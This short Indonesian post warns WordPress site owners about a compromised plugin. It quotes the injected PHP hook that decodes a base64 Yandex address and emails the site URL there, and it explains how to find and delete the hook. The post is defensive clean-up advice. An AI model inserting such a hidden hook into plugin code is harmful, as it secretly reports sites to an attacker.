Bila WP anda mengirimkan banyak email ke wordpressslog@yandex.com, ada kemungkinan salah satu plugin anda kena hacked.
coba cek file yg ada di plugin anda, kode yang disisipkan seperti ini:
add_action(‘wp_head’,’my_wpfunww7c8bb’);function my_wpfunww7c8bb(){if(!username_exists(‘wordpress’)){$addressdecode=base64_decode(“[ redacted ]”);$vari=’WordPress Plugin’;wp_mail($addressdecode,$vari,get_bloginfo(‘wpurl’));}}
dimana base64_decode membuat string ‘d29yZHByZXNzc2xvZ0B5YW5kZXguY29t’
Cari file .php yang memuat string tsb dan delete atau disable baris atau fungsi yg memuat string tsb di atas dari file .php tsb.